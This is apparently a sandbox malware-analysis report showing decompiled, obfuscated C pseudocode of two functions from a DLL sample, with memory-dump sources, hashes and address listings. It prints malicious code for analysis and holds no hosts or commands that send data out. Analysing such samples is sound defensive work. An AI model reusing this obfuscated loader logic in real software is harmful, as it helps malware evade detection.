                                                                                                          0x02b03d31
                                                                                                          0x00000000
                                                                                                          0x02b03bfe
                                                                                                          0x02b03c04
                                                                                                          0x02b03cac
                                                                                                          0x02b03cb1
                                                                                                          0x02b03cb4
                                                                                                          0x02b03cb6
                                                                                                          0x02b03cf7
                                                                                                          0x02b03cf7
                                                                                                          0x02b03cb8
                                                                                                          0x02b03cb8
                                                                                                          0x02b03cba
                                                                                                          0x02b03cba
                                                                                                          0x02b03cbe
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02b03cc0
                                                                                                          0x02b03cd5
                                                                                                          0x02b03cda
                                                                                                          0x02b03cdd
                                                                                                          0x02b03cdf
                                                                                                          0x02b03ced
                                                                                                          0x02b03cee
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02b03ce1
                                                                                                          0x02b03ce1
                                                                                                          0x02b03ce3
                                                                                                          0x02b03ce5
                                                                                                          0x00000000
                                                                                                          0x02b03ce7
                                                                                                          0x02b03ce7
                                                                                                          0x02b03cba
                                                                                                          0x02b03cbe
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02b03cbe
                                                                                                          0x00000000
                                                                                                          0x02b03ce5
                                                                                                          0x02b03cba
                                                                                                          0x02b03cfe
                                                                                                          0x02b03cfe
                                                                                                          0x02b03d00
                                                                                                          0x02b03d27
                                                                                                          0x02b03d27
                                                                                                          0x02b03d02
                                                                                                          0x02b03d06
                                                                                                          0x02b03d16
                                                                                                          0x02b03d1d
                                                                                                          0x02b03d1d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02b03c06
                                                                                                          0x02b03c0c
                                                                                                          0x02b03de2
                                                                                                          0x02b03de2
                                                                                                          0x02b03de8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02b03dee
                                                                                                          0x02b03c12
                                                                                                          0x02b03c53
                                                                                                          0x02b03c58
                                                                                                          0x02b03c5a
                                                                                                          0x02b03c60
                                                                                                          0x02b03c66
                                                                                                          0x00000000
                                                                                                          0x02b03c66
                                                                                                          0x02b03c60
                                                                                                          0x02b03c0c
                                                                                                          0x02b03c04
                                                                                                          0x02b03bf8
                                                                                                          0x02b03bec
                                                                                                          0x02b03be0
                                                                                                          0x02b03dff
                                                                                                          0x02b03e02
                                                                                                          0x02b03e0b
                                                                                                          0x00000000
                                                                                                          0x02b03e0b
                                                                                                          0x02b03db9
                                                                                                          0x02b03dba
                                                                                                          0x02b03dc0
                                                                                                          0x02b03dd0
                                                                                                          0x02b03dd2
                                                                                                          0x02b03dd5
                                                                                                          0x02b03dd7
                                                                                                          0x00000000
                                                                                                          0x02b03ddd
                                                                                                          0x02b03ddd
                                                                                                          0x00000000
                                                                                                          0x02b03ddd
                                                                                                          0x00000000
                                                                                                          0x02b03dd7

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @0$_sC$a>$ms2$pj$q\1$v*${*
                                                                                                          • API String ID: 0-3081288078
                                                                                                          • Opcode ID: a61fcc09a46c93248ed7963f8a021c79977786b58ba3886c9a9125f46d304d28
                                                                                                          • Instruction ID: 95b27676fced30986e2012901c13a3e1b092ba208f8c8bcc3860fcf7fba82ff1
                                                                                                          • Opcode Fuzzy Hash: a61fcc09a46c93248ed7963f8a021c79977786b58ba3886c9a9125f46d304d28
                                                                                                          • Instruction Fuzzy Hash: 590253715083809FD3A9CF65C589A4BBBE1FBC4758F108A0DF6DA862A0D7B58949CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02B046BD, Relevance: 10.3, Strings: 8, Instructions: 293COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 94%
                                                                                                          			E02B046BD(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				void* _t316;
				intOrPtr _t339;
				intOrPtr* _t341;
				void* _t343;
				intOrPtr* _t346;
				void* _t348;
				intOrPtr* _t349;
				void* _t351;
				intOrPtr _t367;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				void* _t375;
				void* _t376;

				_t369 = _a16;
				_t349 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t316);
				_v16 = 0xd9d351;
				_t367 = 0;
				_v12 = 0x17e122;
				_t376 = _t375 + 0x18;
				_v8 = 0;
				_v96 = 0xcc9d59;
				_t351 = 0xff449f4;
				_v96 = _v96 << 0xc;
				_v96 = _v96 + 0x162d;
				_v96 = _v96 ^ 0xc9d5a62c;
				_v132 = 0x3cc17f;
				_v132 = _v132 + 0xffff84d9;
				_t370 = 0x52;
				_v132 = _v132 * 0x3d;
				_v132 = _v132 << 0xf;
				_v132 = _v132 ^ 0x617c0001;
				_v48 = 0x63951b;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x0000c72a;
				_v64 = 0xbc1395;
				_v64 = _v64 >> 0xd;
				_v64 = _v64 ^ 0x000005e0;
				_v80 = 0x50b5ee;
				_v80 = _v80 + 0xf34;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x00286291;
				_v92 = 0x9715d8;
				_v92 = _v92 * 0x46;
				_v92 = _v92 << 0xd;
				_v92 = _v92 ^ 0xff220000;
				_v52 = 0xfde3f2;
				_v52 = _v52 + 0xa710;
				_v52 = _v52 ^ 0x00fe8b02;
				_v160 = 0x198337;
				_v160 = _v160 + 0xffff007e;
				_v160 = _v160 << 0x10;
				_v160 = _v160 ^ 0x69569842;
				_v160 = _v160 ^ 0xeaeb46e9;
				_v28 = 0xcc69bd;
				_v28 = _v28 ^ 0xeecfab9f;
				_v28 = _v28 ^ 0xee01123b;
				_v136 = 0x76b317;
				_v136 = _v136 / _t370;
				_v136 = _v136 + 0xffff81f3;
				_v136 = _v136 << 3;
				_v136 = _v136 ^ 0x00064d41;
				_v112 = 0x80a4bd;
				_v112 = _v112 * 0x13;
				_v112 = _v112 << 0xa;
				_v112 = _v112 + 0xcad4;
				_v112 = _v112 ^ 0x30efc400;
				_v144 = 0x82a288;
				_v144 = _v144 << 2;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 << 9;
				_v144 = _v144 ^ 0x0011be13;
				_v56 = 0x7edd30;
				_v56 = _v56 * 0x55;
				_v56 = _v56 ^ 0x2a184bb4;
				_v88 = 0xe2a415;
				_t371 = 6;
				_v88 = _v88 * 0x2a;
				_v88 = _v88 + 0xffff5f32;
				_v88 = _v88 ^ 0x252ac732;
				_v128 = 0xe004bc;
				_v128 = _v128 ^ 0x574173bd;
				_v128 = _v128 >> 9;
				_v128 = _v128 ^ 0xd8221cc5;
				_v128 = _v128 ^ 0xd803a3d4;
				_v152 = 0x516ea5;
				_v152 = _v152 + 0xffff4486;
				_v152 = _v152 | 0x140257d0;
				_v152 = _v152 >> 0xf;
				_v152 = _v152 ^ 0x00051039;
				_v120 = 0x9f4975;
				_v120 = _v120 ^ 0x86b89632;
				_v120 = _v120 * 0x24;
				_v120 = _v120 | 0x1b5f0b87;
				_v120 = _v120 ^ 0xdfd1de63;
				_v36 = 0xa5f8e9;
				_v36 = _v36 + 0x714e;
				_v36 = _v36 ^ 0x00af22d8;
				_v44 = 0x824fdb;
				_v44 = _v44 + 0xffff91e5;
				_v44 = _v44 ^ 0x008fd473;
				_v68 = 0x680ab0;
				_v68 = _v68 + 0xbc39;
				_v68 = _v68 / _t371;
				_v68 = _v68 ^ 0x001a68c1;
				_v76 = 0x17a4af;
				_v76 = _v76 >> 0xb;
				_t372 = 0x5b;
				_v76 = _v76 / _t372;
				_v76 = _v76 ^ 0x0007f211;
				_v84 = 0x315e60;
				_v84 = _v84 + 0x702b;
				_v84 = _v84 + 0xffff10cc;
				_v84 = _v84 ^ 0x003e64ec;
				_v100 = 0x9cc34d;
				_v100 = _v100 | 0x947c2ff5;
				_t373 = 0x3a;
				_v100 = _v100 / _t373;
				_v100 = _v100 ^ 0x02979c4b;
				_v140 = 0xbfeff4;
				_v140 = _v140 ^ 0x822e0370;
				_v140 = _v140 + 0xf2f6;
				_v140 = _v140 | 0x96ab8507;
				_v140 = _v140 ^ 0x96bf89b8;
				_v60 = 0xfd95c4;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x07e16726;
				_v148 = 0x38036;
				_v148 = _v148 ^ 0x54103d5f;
				_v148 = _v148 | 0x54303272;
				_t206 =  &_v148; // 0x54303272
				_v148 =  *_t206;
				_v148 = _v148 ^ 0x5432cd2c;
				_v40 = 0xc550eb;
				_v40 = _v40 | 0x63f29c9e;
				_v40 = _v40 ^ 0x63f29262;
				_v32 = 0xf7791b;
				_v32 = _v32 * 0x51;
				_v32 = _v32 ^ 0x4e4d9c2b;
				_v156 = 0xdcae59;
				_v156 = _v156 + 0xffffc6cd;
				_v156 = _v156 + 0xfffffd52;
				_v156 = _v156 ^ 0x46382038;
				_v156 = _v156 ^ 0x46e78b29;
				_v72 = 0xac5d66;
				_v72 = _v72 | 0xb655dd15;
				_v72 = _v72 + 0xffff07b1;
				_v72 = _v72 ^ 0xb6f51c6c;
				_v104 = 0x2e3a8e;
				_v104 = _v104 | 0xfac334a1;
				_v104 = _v104 << 4;
				_v104 = _v104 ^ 0xaefe5277;
				_v108 = 0xcd35f0;
				_v108 = _v108 << 0xf;
				_v108 = _v108 | 0xf31160b4;
				_v108 = _v108 ^ 0xc3cc8d90;
				_v108 = _v108 ^ 0x3831362e;
				_v116 = 0x7e4b3f;
				_v116 = _v116 << 9;
				_v116 = _v116 + 0xa646;
				_v116 = _v116 + 0x5b3c;
				_v116 = _v116 ^ 0xfc982242;
				_v124 = 0x9fd9df;
				_v124 = _v124 >> 6;
				_v124 = _v124 << 0xf;
				_v124 = _v124 << 1;
				_v124 = _v124 ^ 0x7f607f7f;
				do {
					while(_t351 != 0x8274db) {
						if(_t351 == 0x30c1656) {
							_push(_t351);
							_push(_t351);
							_t339 = E02AEC5D8(_v20);
							_t376 = _t376 + 0xc;
							_v24 = _t339;
							if(_t339 != 0) {
								_t351 = 0x6ee5562;
								continue;
							}
						} else {
							if(_t351 == 0x6ee5562) {
								_t341 =  *0x2b06224; // 0x0
								_t343 = E02B011B0(_v84, _t351, _v92, _v100, _v132, _v140, _v60, _v148, _v20,  *_t369, _v40,  *((intOrPtr*)(_t369 + 4)), _v32,  &_v20, _v156, _v72, _v24,  *_t341, _v104);
								_t376 = _t376 + 0x48;
								if(_t343 == _v52) {
									 *_t349 = _v24;
									_t367 = 1;
									 *((intOrPtr*)(_t349 + 4)) = _v20;
								} else {
									_t351 = 0x8274db;
									continue;
								}
							} else {
								if(_t351 == 0xc41b31c) {
									_t346 =  *0x2b06224; // 0x0
									_t348 = E02B011B0(_v160, _t351, _v48, _v28, _v96, _v136, _v112, _v144, _v64,  *_t369, _v56,  *((intOrPtr*)(_t369 + 4)), _v88,  &_v20, _v128, _v152, _t367,  *_t346, _v120);
									_t376 = _t376 + 0x48;
									if(_t348 == _v80) {
										_t351 = 0x30c1656;
										continue;
									}
								} else {
									if(_t351 != 0xff449f4) {
										goto L14;
									} else {
										_t351 = 0xc41b31c;
										continue;
									}
								}
							}
						}
						L17:
						return _t367;
					}
					E02B02B09(_v108, _v24, _v116, _v124);
					_t351 = 0xc0b2195;
					L14:
				} while (_t351 != 0xc0b2195);
				goto L17;
			}

























































                                                                                                          0x02b046c6
                                                                                                          0x02b046cd
                                                                                                          0x02b046d0
                                                                                                          0x02b046d1
                                                                                                          0x02b046d8
                                                                                                          0x02b046df
                                                                                                          0x02b046e6
                                                                                                          0x02b046e7
                                                                                                          0x02b046e8
                                                                                                          0x02b046ed
                                                                                                          0x02b046f8
                                                                                                          0x02b046fa
                                                                                                          0x02b04705
                                                                                                          0x02b04708
                                                                                                          0x02b04711
                                                                                                          0x02b04719
                                                                                                          0x02b0471e
                                                                                                          0x02b04723
                                                                                                          0x02b0472b
                                                                                                          0x02b04733
                                                                                                          0x02b0473b
                                                                                                          0x02b0474a
                                                                                                          0x02b0474b
                                                                                                          0x02b0474f
                                                                                                          0x02b04754
                                                                                                          0x02b0475c
                                                                                                          0x02b04767
                                                                                                          0x02b0476f
                                                                                                          0x02b0477a
                                                                                                          0x02b04782
                                                                                                          0x02b04787
                                                                                                          0x02b0478f
                                                                                                          0x02b04797
                                                                                                          0x02b0479f
                                                                                                          0x02b047a3
                                                                                                          0x02b047ab
                                                                                                          0x02b047b8
                                                                                                          0x02b047bc
                                                                                                          0x02b047c1
                                                                                                          0x02b047c9
                                                                                                          0x02b047d4
                                                                                                          0x02b047df
                                                                                                          0x02b047ea
                                                                                                          0x02b047f2
                                                                                                          0x02b047fa
                                                                                                          0x02b047ff
                                                                                                          0x02b04807
                                                                                                          0x02b0480f
                                                                                                          0x02b0481a
                                                                                                          0x02b04825
                                                                                                          0x02b04830
                                                                                                          0x02b0483e
                                                                                                          0x02b04842
                                                                                                          0x02b0484a
                                                                                                          0x02b0484f
                                                                                                          0x02b04857
                                                                                                          0x02b04864
                                                                                                          0x02b04868
                                                                                                          0x02b0486d
                                                                                                          0x02b04875
                                                                                                          0x02b0487d
                                                                                                          0x02b04885
                                                                                                          0x02b0488a
                                                                                                          0x02b0488f
                                                                                                          0x02b04894
                                                                                                          0x02b0489c
                                                                                                          0x02b048a9
                                                                                                          0x02b048ad
                                                                                                          0x02b048b5
                                                                                                          0x02b048c6
                                                                                                          0x02b048c9
                                                                                                          0x02b048cd
                                                                                                          0x02b048d5
                                                                                                          0x02b048dd
                                                                                                          0x02b048e5
                                                                                                          0x02b048ed
                                                                                                          0x02b048f2
                                                                                                          0x02b048fa
                                                                                                          0x02b04902
                                                                                                          0x02b0490a
                                                                                                          0x02b04912
                                                                                                          0x02b0491a
                                                                                                          0x02b0491f
                                                                                                          0x02b04927
                                                                                                          0x02b0492f
                                                                                                          0x02b0493c
                                                                                                          0x02b04940
                                                                                                          0x02b04948
                                                                                                          0x02b04950
                                                                                                          0x02b0495b
                                                                                                          0x02b04966
                                                                                                          0x02b04971
                                                                                                          0x02b0497c
                                                                                                          0x02b04987
                                                                                                          0x02b04992
                                                                                                          0x02b0499a
                                                                                                          0x02b049aa
                                                                                                          0x02b049ae
                                                                                                          0x02b049b6
                                                                                                          0x02b049be
                                                                                                          0x02b049c7
                                                                                                          0x02b049cc
                                                                                                          0x02b049d2
                                                                                                          0x02b049da
                                                                                                          0x02b049e2
                                                                                                          0x02b049ea
                                                                                                          0x02b049f2
                                                                                                          0x02b049fa
                                                                                                          0x02b04a02
                                                                                                          0x02b04a0e
                                                                                                          0x02b04a11
                                                                                                          0x02b04a15
                                                                                                          0x02b04a1d
                                                                                                          0x02b04a25
                                                                                                          0x02b04a2d
                                                                                                          0x02b04a35
                                                                                                          0x02b04a3d
                                                                                                          0x02b04a45
                                                                                                          0x02b04a4d
                                                                                                          0x02b04a52
                                                                                                          0x02b04a5a
                                                                                                          0x02b04a62
                                                                                                          0x02b04a6a
                                                                                                          0x02b04a72
                                                                                                          0x02b04a76
                                                                                                          0x02b04a7a
                                                                                                          0x02b04a82
                                                                                                          0x02b04a8d
                                                                                                          0x02b04a98
                                                                                                          0x02b04aa3
                                                                                                          0x02b04ab6
                                                                                                          0x02b04abd
                                                                                                          0x02b04ac8
                                                                                                          0x02b04ad0
                                                                                                          0x02b04ad8
                                                                                                          0x02b04ae0
                                                                                                          0x02b04aed
                                                                                                          0x02b04af5
                                                                                                          0x02b04afd
                                                                                                          0x02b04b05
                                                                                                          0x02b04b0d
                                                                                                          0x02b04b15
                                                                                                          0x02b04b1d
                                                                                                          0x02b04b25
                                                                                                          0x02b04b2a
                                                                                                          0x02b04b32
                                                                                                          0x02b04b3a
                                                                                                          0x02b04b3f
                                                                                                          0x02b04b47
                                                                                                          0x02b04b4f
                                                                                                          0x02b04b57
                                                                                                          0x02b04b5f
                                                                                                          0x02b04b64
                                                                                                          0x02b04b6c
                                                                                                          0x02b04b74
                                                                                                          0x02b04b7c
                                                                                                          0x02b04b84
                                                                                                          0x02b04b89
                                                                                                          0x02b04b8e
                                                                                                          0x02b04b92
                                                                                                          0x02b04b9a
                                                                                                          0x02b04b9a
                                                                                                          0x02b04ba8
                                                                                                          0x02b04cdd
                                                                                                          0x02b04cde
                                                                                                          0x02b04ce6
                                                                                                          0x02b04ceb
                                                                                                          0x02b04cee
                                                                                                          0x02b04cf7
                                                                                                          0x02b04cf9
                                                                                                          0x00000000
                                                                                                          0x02b04cf9
                                                                                                          0x02b04bae
                                                                                                          0x02b04bb4
                                                                                                          0x02b04c4e
                                                                                                          0x02b04caf
                                                                                                          0x02b04cb4
                                                                                                          0x02b04cbe
                                                                                                          0x02b04d39
                                                                                                          0x02b04d3b
                                                                                                          0x02b04d43
                                                                                                          0x02b04cc0
                                                                                                          0x02b04cc0
                                                                                                          0x00000000
                                                                                                          0x02b04cc0
                                                                                                          0x02b04bba
                                                                                                          0x02b04bc0
                                                                                                          0x02b04bd9
                                                                                                          0x02b04c2e
                                                                                                          0x02b04c33
                                                                                                          0x02b04c3a
                                                                                                          0x02b04c40
                                                                                                          0x00000000
                                                                                                          0x02b04c40
                                                                                                          0x02b04bc2
                                                                                                          0x02b04bc8
                                                                                                          0x00000000
                                                                                                          0x02b04bce
                                                                                                          0x02b04bce
                                                                                                          0x00000000
                                                                                                          0x02b04bce
                                                                                                          0x02b04bc8
                                                                                                          0x02b04bc0
                                                                                                          0x02b04bb4
                                                                                                          0x02b04d46
                                                                                                          0x02b04d52
                                                                                                          0x02b04d52
                                                                                                          0x02b04d16
                                                                                                          0x02b04d1d
                                                                                                          0x02b04d22
                                                                                                          0x02b04d22
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: .618$8 8F$<[$?K~$Nq$r20T$F$d>
                                                                                                          • API String ID: 0-914106314
                                                                                                          • Opcode ID: e25dad3fd16ffd8f67eb6368693775be6104024189c07b755cd719b423aa0bd3
                                                                                                          • Instruction ID: a1f99f21c32fd1c186167d812746c3090d6cf07cc086f71667bdbde70806a6bd
                                                                                                          • Opcode Fuzzy Hash: e25dad3fd16ffd8f67eb6368693775be6104024189c07b755cd719b423aa0bd3
                                                                                                          • Instruction Fuzzy Hash: 4DF1ED71009380DFD769CF61C98AA5BBBF1FB85758F108A1DE2DA86260D7B58949CF03
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF017B, Relevance: 10.3, Strings: 8, Instructions: 263COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 90%
                                                                                                          			E02AF017B(void* __ecx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _t272;
				void* _t295;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				void* _t312;
				void* _t334;
				intOrPtr _t335;
				signed int* _t338;

				_push(_a32);
				_t334 = __ecx;
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t272 = E02AFFE29(0);
				_v84 = _t272;
				_t338 =  &(( &_v196)[0xa]);
				_v72 = _t272;
				_t335 = _t272;
				_v80 = 0x49e87b;
				_v76 = 0xc5c8e1;
				_t312 = 0x7956bd9;
				_v96 = 0x2d2511;
				_t305 = 0x6f;
				_v96 = _v96 / _t305;
				_v96 = _v96 ^ 0x00006c1e;
				_v192 = 0x2be237;
				_t22 =  &_v192; // 0x2be237
				_t306 = 0x35;
				_v192 =  *_t22 * 0x2a;
				_v192 = _v192 ^ 0x8f196f07;
				_v192 = _v192 ^ 0x2da4b7e5;
				_v192 = _v192 ^ 0xa58ec5c4;
				_v172 = 0x207d98;
				_v172 = _v172 ^ 0x972b32db;
				_v172 = _v172 | 0x9c7c4c28;
				_v172 = _v172 * 0x48;
				_v172 = _v172 ^ 0xdbcfdb8a;
				_v100 = 0x57c7e;
				_v100 = _v100 + 0xffffdd89;
				_v100 = _v100 ^ 0x000aed2d;
				_v124 = 0x64cad1;
				_v124 = _v124 + 0xffff2d5b;
				_v124 = _v124 << 4;
				_v124 = _v124 ^ 0x063cb223;
				_v148 = 0xd38c19;
				_v148 = _v148 >> 7;
				_v148 = _v148 >> 0xf;
				_v148 = _v148 ^ 0x0008e1ac;
				_v88 = 0xe6598d;
				_v88 = _v88 ^ 0xb40d33dc;
				_v88 = _v88 ^ 0xb4eaaa1c;
				_v92 = 0x85b818;
				_v92 = _v92 + 0xffffc4c3;
				_v92 = _v92 ^ 0x008e2283;
				_v104 = 0x6cafca;
				_v104 = _v104 * 0x73;
				_v104 = _v104 ^ 0x30d8f33f;
				_v120 = 0xea107;
				_v120 = _v120 / _t306;
				_v120 = _v120 ^ 0x000228b8;
				_v112 = 0x4bcc54;
				_v112 = _v112 * 0x3f;
				_v112 = _v112 ^ 0x12af13c7;
				_v176 = 0x25f352;
				_v176 = _v176 * 0x1d;
				_t307 = 0x55;
				_v176 = _v176 / _t307;
				_v176 = _v176 + 0xa166;
				_v176 = _v176 ^ 0x00018b34;
				_v168 = 0x70163a;
				_v168 = _v168 | 0xb665b778;
				_v168 = _v168 + 0xffff15cb;
				_v168 = _v168 + 0xffff931b;
				_v168 = _v168 ^ 0xb6787764;
				_v184 = 0xfb3451;
				_t308 = 0x2f;
				_v184 = _v184 * 0x55;
				_v184 = _v184 + 0xffff75a5;
				_v184 = _v184 * 0x5c;
				_v184 = _v184 ^ 0xf953722f;
				_v160 = 0x3448db;
				_v160 = _v160 | 0x0a9a3806;
				_v160 = _v160 + 0xffffbb3e;
				_v160 = _v160 << 6;
				_v160 = _v160 ^ 0xaf82d104;
				_v108 = 0x7f4bc6;
				_v108 = _v108 * 0x47;
				_v108 = _v108 ^ 0x234271fe;
				_v116 = 0x137e80;
				_v116 = _v116 << 7;
				_v116 = _v116 ^ 0x09bed852;
				_v140 = 0x58b738;
				_v140 = _v140 >> 3;
				_v140 = _v140 / _t308;
				_v140 = _v140 ^ 0x0006291c;
				_v152 = 0x1dae44;
				_v152 = _v152 + 0xb010;
				_t309 = 0x7a;
				_v152 = _v152 / _t309;
				_v152 = _v152 ^ 0x0004435a;
				_v136 = 0x3e9c6a;
				_v136 = _v136 + 0xffff4267;
				_v136 = _v136 + 0xa013;
				_v136 = _v136 ^ 0x00313444;
				_v128 = 0xfc4661;
				_v128 = _v128 ^ 0x84ef8931;
				_v128 = _v128 >> 6;
				_v128 = _v128 ^ 0x021c54a7;
				_v144 = 0x2fd65c;
				_v144 = _v144 | 0x65ad1a2d;
				_v144 = _v144 ^ 0x87299bd7;
				_v144 = _v144 ^ 0xe281bdf5;
				_v180 = 0x40c6e5;
				_v180 = _v180 + 0xffff5f75;
				_v180 = _v180 + 0x6863;
				_v180 = _v180 << 0xc;
				_v180 = _v180 ^ 0x08e53add;
				_v132 = 0x50fbcf;
				_v132 = _v132 | 0xda091e24;
				_v132 = _v132 + 0xffffc3f6;
				_v132 = _v132 ^ 0xda5ae4d8;
				_v188 = 0x29fd87;
				_v188 = _v188 | 0x249d2c08;
				_v188 = _v188 << 1;
				_v188 = _v188 | 0xc4033418;
				_v188 = _v188 ^ 0xcd7b5999;
				_v196 = 0x78de76;
				_v196 = _v196 * 0x7c;
				_v196 = _v196 + 0xffff171c;
				_v196 = _v196 >> 5;
				_v196 = _v196 ^ 0x01d3afb7;
				_v156 = 0x2e37f5;
				_v156 = _v156 + 0xffff32dd;
				_v156 = _v156 >> 1;
				_v156 = _v156 * 0x73;
				_v156 = _v156 ^ 0x0a367c41;
				_v164 = 0x79bcb0;
				_v164 = _v164 + 0x8106;
				_v164 = _v164 + 0x4469;
				_v164 = _v164 + 0xffff19e3;
				_v164 = _v164 ^ 0x007fae8c;
				do {
					while(_t312 != 0x59e10b1) {
						if(_t312 == 0x7956bd9) {
							_t312 = 0x84e17ac;
							continue;
						} else {
							if(_t312 == 0x84e17ac) {
								_t264 =  &_v84; // 0x49e87b
								_t267 =  &_v172; // 0xa367c41
								_t295 = E02AF4178( *_t267, _v100, _t264, _a20, _v124);
								_t338 =  &(_t338[4]);
								__eflags = _t295;
								if(_t295 != 0) {
									_t312 = 0x9148c69;
									continue;
								}
							} else {
								_t344 = _t312 - 0x9148c69;
								if(_t312 != 0x9148c69) {
									goto L10;
								} else {
									E02AFFE2A(_v148, _v88, 0x44,  &_v68);
									_push(_v112);
									_v68 = 0x44;
									_push(_v120);
									_push(_v104);
									_v60 = E02AFE1F8(0x2ae1224, _v92, _t344);
									_t335 = E02AE473D(_a20, _v176, _v168, 0x2ae1224, 0x2ae1224, _v184, _v160, 0, _a24, _v108, _t334, _v116, _v140, _v152, _v84, 0x2ae1224, _v136, _v128, _v144, _v192 | _v96,  &_v68);
									E02AFFECB(_v60, _v180, _v132, _v188, _v196);
									_t338 =  &(_t338[0x1c]);
									_t312 = 0x59e10b1;
									continue;
								}
							}
						}
						goto L11;
					}
					_t269 =  &_v84; // 0x49e87b
					E02AF7952(_v156,  *_t269, _v164);
					_t312 = 0xf5fdc0f;
					L10:
					__eflags = _t312 - 0xf5fdc0f;
				} while (_t312 != 0xf5fdc0f);
				L11:
				return _t335;
			}
















































                                                                                                          0x02af0185
                                                                                                          0x02af018e
                                                                                                          0x02af0190
                                                                                                          0x02af0197
                                                                                                          0x02af019e
                                                                                                          0x02af01a5
                                                                                                          0x02af01ac
                                                                                                          0x02af01b3
                                                                                                          0x02af01b4
                                                                                                          0x02af01bb
                                                                                                          0x02af01bc
                                                                                                          0x02af01bd
                                                                                                          0x02af01c2
                                                                                                          0x02af01c9
                                                                                                          0x02af01cc
                                                                                                          0x02af01d3
                                                                                                          0x02af01d5
                                                                                                          0x02af01e2
                                                                                                          0x02af01ed
                                                                                                          0x02af01f2
                                                                                                          0x02af0200
                                                                                                          0x02af0205
                                                                                                          0x02af020b
                                                                                                          0x02af0213
                                                                                                          0x02af021b
                                                                                                          0x02af0220
                                                                                                          0x02af0221
                                                                                                          0x02af0225
                                                                                                          0x02af022d
                                                                                                          0x02af0235
                                                                                                          0x02af023d
                                                                                                          0x02af0245
                                                                                                          0x02af024d
                                                                                                          0x02af025a
                                                                                                          0x02af025e
                                                                                                          0x02af0266
                                                                                                          0x02af026e
                                                                                                          0x02af0276
                                                                                                          0x02af027e
                                                                                                          0x02af0286
                                                                                                          0x02af028e
                                                                                                          0x02af0293
                                                                                                          0x02af029b
                                                                                                          0x02af02a3
                                                                                                          0x02af02a8
                                                                                                          0x02af02ad
                                                                                                          0x02af02b5
                                                                                                          0x02af02bd
                                                                                                          0x02af02c5
                                                                                                          0x02af02cd
                                                                                                          0x02af02d5
                                                                                                          0x02af02dd
                                                                                                          0x02af02e5
                                                                                                          0x02af02f2
                                                                                                          0x02af02f6
                                                                                                          0x02af02fe
                                                                                                          0x02af030c
                                                                                                          0x02af0310
                                                                                                          0x02af0318
                                                                                                          0x02af0325
                                                                                                          0x02af0329
                                                                                                          0x02af0331
                                                                                                          0x02af033e
                                                                                                          0x02af034a
                                                                                                          0x02af034f
                                                                                                          0x02af0355
                                                                                                          0x02af035d
                                                                                                          0x02af0365
